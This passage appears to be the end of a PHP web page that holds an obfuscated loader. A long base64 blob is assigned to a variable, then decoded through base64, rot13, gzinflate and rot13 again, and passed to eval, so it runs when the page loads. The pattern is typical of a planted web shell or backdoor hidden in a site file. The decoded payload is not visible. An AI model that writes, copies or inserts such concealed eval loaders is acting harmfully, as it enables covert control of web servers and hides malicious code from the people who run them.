ZvUg3r/dlu93HwTTb37lZDWnMwcvoKnY+Pt1qBsOrpr65OVfrO21Fn8qbj0LjWa7+ZTC6e0FlHWx17BzucuTC/nOm12vt8eLjtGDsGTv1newul1qWYoaKPTgcJQ/5m/QNN1kfPqVUnYbx9NQ+fHza19KK0LYOV5Zobj3eDad7kkjeRkY7I37z5XZ/dEZrFCRG64zbpebV5fnmiN9aYmkE/vWg1blCnh/ctHe15iFqXhR4tilJn8bnhi1nDli7u9kWlfCF0nIu396tXbdNIYnLwrSnPtbk465LADuni8+THJ5VWkNB87awTFMKOwz1/W9rAYRSZdg9xn0hb2YlZKhJQhQvKYhKkcPYTFHFHhk3Kvfw4zfqo1tBbfqlbAhBkBTeK9p0kXunY58F5BPvWAhq5vzCdvhBwWtL8rt4LwRkIOFSEOgLXnxmjIrQVOOxdxsTRxsMyfVb08EJN4S6hoI+IBCxW4XqDs6WSRafadSGNfLOFAJ/GvMxoPVoluULVz7XksnkBrYqnMffsRMEFQR6bygAzOJU2NsTl1Yr2HPzIIiKB6LiBzGYDgXb0hBeGuaDcc+HZ+BOOvBOyhvjnq1XPhjb827sbDD2fDCqNrQIMX+UD9JjPqSMBynjg0cn+3MFduCDos+HkvagpH1Dd6YqqRq+oG0WJ3o+tJQHLeWD1nk1ZlW0UcMHUvSgsFwlfsILfd6Xp+eqd5Cc6/OG28mJ02DFa+/rBvoNxaU4OsIDQLw80UyTBzR4f4msGZz111+CXw9LXTIB8BxUG+h1Xp6CRskGZuGiW9BNxfk1ppdiVHf5aSQPItqRTKIdmbntKAuSrS+oMbNnO5Lp5duRinVUmuGoLHWHk6cYeYez6RZK5wSiuzv5Ry2DCmqNQQdIK7VpPZfLo8tHIomoBxbf3YSqA5QVnkcbeqNvrYIUUJ3i1FuQyi8K1NHiaOGK7JwFBFeyouoamA+ZA5ypehgiqqn2FJJ3+JKpl8//Dw==';
eval (str_rot13(gzinflate(str_rot13(base64_decode($aDriv4)))));
?>
</html>